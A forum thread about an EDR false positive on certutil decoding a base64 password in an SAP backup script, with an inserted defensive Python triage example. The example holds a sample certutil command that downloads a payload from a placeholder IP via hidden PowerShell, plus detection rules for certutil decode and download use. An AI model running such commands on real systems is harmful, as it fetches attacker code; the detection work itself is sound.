Exclude Threat Detection "TA0005 - Defense Evasion"

Our SAP server's backup process, which uses certutil.exe, is detected as a defense evasion threat.

In detail, the detection is:

Detection ID:        WIN-EVA-PRC-CERTUTIL-DECODE-1
Command Line:        certutil -decode password.b64 password.txt
File Path:           C:\Windows\System32\certutil.exe
Parent Command Line: C:\Windows\System32\cmd.exe /c "C:\Users\p01adm\scripts\backup_db.cmd P01 tlog Y:\sapbackup > backup_tlog.log 2 >&1!"
Mitre Tactics:       TA0005  Defense Evasion
                     T1140   Deobfuscate/Decode Files or Information

I've tried to exclude certutil.exe with an exclusion in the Threat Protection device policy, but it does not work.

How can I disable this detection?

Thanks.

  • Hi Colsam,

    Thanks for reaching out to the Sophos Community Forum. 

    Allow me some time to inquire with our team regarding your question and I'll update you here. 

    Kushal Lakhan
    Team Lead, Global Community Support
  • The exclusions in Threat Protection policy will not suppress EDR/XDR detections. We expect to allow customer suppression of detections in the first quarter of the new year. (As always, roadmaps are subject to change.) In the meantime, I will pass this info along to our detections team to determine whether a global suppression or change to the rule is warranted in this case.

  • That's a tough one, as certutil is often used for evil purposes (I understand, not in your case). A question about your backups: is this a SAP native backup app that is calling certutil, a script you (or someone else) wrote, or a commercial backup application that is leveraging certutil? Just curious so I can keep an eye out for it as an MSP.

    CTO, Convergent Information Security Solutions, LLC

    https://www.convergesecurity.com

    Sophos Platinum Partner

    --------------------------------------

    Advice given as posted on this forum does not construe a support relationship or other relationship with Convergent Information Security Solutions, LLC or its subsidiaries.  Use the advice given at your own risk.

  • I see it is using certutil to encrypt / decrypt what looks like the password for the backup to complete... I have seen some customers with custom powershell scripts that decode / encode things in base64 trigger events too.

  • You're right, we use certutil to encrypt / decrypt the password for the backup. I'll wait for the feature to suppress EDR/XDR detections.

    Thanks for your replies.
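To make concrete what a detection like the one quoted in the original post keys on, and why the Threat Protection exclusion discussed in the first reply is not the lever for it, here is an added example (my own code, not Sophos's and not the rule logic behind their detection). It triages constructed Windows process-creation events for certutil use. The rule ID WIN-EVA-PRC-CERTUTIL-DECODE-1 is taken from the post as a label only; its matching logic, the EXAMPLE-* rule IDs, the suppression structure and all sample events are assumptions of this example and do not describe how Sophos's detections or the suppression feature mentioned in the reply work. The point it shows is that a suppression meant to whitelist one job has to match that job's full context (rule, command line, parent, binary path), which is a different thing from excluding the certutil.exe binary. One caveat the thread does not state: `certutil -decode` is base64 decoding, not decryption, so password.b64 is only obfuscated and anyone who can read the file can recover the password.

```python
"""Triage of Windows process-creation events for certutil LOLBin use.

Added example (not Sophos code). The rule ID quoted in the post is reused as a
label only; the matching logic, the EXAMPLE-* rule IDs, the suppression
structure and the sample events are this example's own constructions.
"""
import re

# Constructed sample events. Field names mirror the detection quoted in the post.
EVENTS = [
    {   # the SAP backup job from the post: decode of a base64 password file
        "image": r"C:\Windows\System32\certutil.exe",
        "cmdline": "certutil -decode password.b64 password.txt",
        "parent_cmdline": r'C:\Windows\System32\cmd.exe /c "C:\Users\p01adm\scripts\backup_db.cmd P01 tlog Y:\sapbackup > backup_tlog.log 2 >&1!"',
    },
    {   # constructed: certutil used as a downloader from a hidden PowerShell
        "image": r"C:\Windows\System32\certutil.exe",
        "cmdline": r"certutil -urlcache -split -f http://192.0.2.10/payload.b64 C:\Users\Public\p.b64",
        "parent_cmdline": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -w hidden",
    },
    {   # constructed: legitimate certificate chain check, should not fire
        "image": r"C:\Windows\System32\certutil.exe",
        "cmdline": "certutil -verify -urlfetch server.cer",
        "parent_cmdline": r"C:\Windows\System32\cmd.exe",
    },
    {   # constructed: copy of certutil run from a user-writable path, slash-style option
        "image": r"C:\Temp\certutil.exe",
        "cmdline": "certutil /decode a.txt b.exe",
        "parent_cmdline": r"C:\Windows\System32\cmd.exe",
    },
]

DECODE_FLAGS = {"-decode", "-decodehex", "-encode", "-encodehex"}
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")


def certutil_args(cmdline):
    """Split a certutil command line and normalise option prefixes.

    certutil accepts both '-decode' and '/decode'; fold them to one form so a
    rule cannot be dodged by swapping the prefix.
    """
    out = []
    for tok in cmdline.split()[1:]:
        if tok[:1] in "-/":
            tok = "-" + tok[1:].lower()
        out.append(tok)
    return out


def classify(event):
    """Return (rule_id, technique) hits for one process-creation event."""
    hits = []
    image = event["image"].lower()
    if not image.endswith("\\certutil.exe"):
        return hits
    flags = {a for a in certutil_args(event["cmdline"]) if a.startswith("-")}
    if flags & DECODE_FLAGS:                                   # T1140 decode/encode of a file
        hits.append(("WIN-EVA-PRC-CERTUTIL-DECODE-1", "T1140"))
    if "-urlcache" in flags or ("-urlfetch" in flags and "-verify" not in flags):
        hits.append(("EXAMPLE-CERTUTIL-DOWNLOAD", "T1105"))    # ingress tool transfer
    if not image.startswith(SYSTEM_DIRS):
        hits.append(("EXAMPLE-CERTUTIL-RELOCATED", "T1036"))   # system binary outside its home
    return hits


# A suppression for the known-good job matches the detection's own context: which
# rule, the exact command line, the expected parent and the genuine binary path.
# Excluding certutil.exe by path alone expresses none of this. Hypothetical structure.
SUPPRESSIONS = [
    {
        "rule_id": "WIN-EVA-PRC-CERTUTIL-DECODE-1",
        "image": "c:\\windows\\system32\\certutil.exe",
        "cmdline": re.compile(r"^certutil\s+-decode\s+password\.b64\s+password\.txt$", re.I),
        "parent_cmdline": re.compile(r"\\scripts\\backup_db\.cmd\b", re.I),
    },
]


def suppressed(event, rule_id):
    """True only if every field of some suppression matches this event and rule."""
    return any(
        s["rule_id"] == rule_id
        and event["image"].lower() == s["image"]
        and s["cmdline"].search(event["cmdline"]) is not None
        and s["parent_cmdline"].search(event["parent_cmdline"]) is not None
        for s in SUPPRESSIONS
    )


def triage(events):
    """Return (event index, rule_id, technique, action) for every hit."""
    results = []
    for i, ev in enumerate(events):
        for rule_id, technique in classify(ev):
            action = "suppress" if suppressed(ev, rule_id) else "alert"
            results.append((i, rule_id, technique, action))
    return results


if __name__ == "__main__":
    for row in triage(EVENTS):
        print(row)
```

Run as a script it prints one row per hit: the SAP job is suppressed only while its parent is the expected backup_db.cmd; the same decode launched from a different parent, or from a copy of certutil outside System32, still alerts, and the downloader pattern is never covered by the backup suppression.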

  • Thank you, I'll wait for this new feature.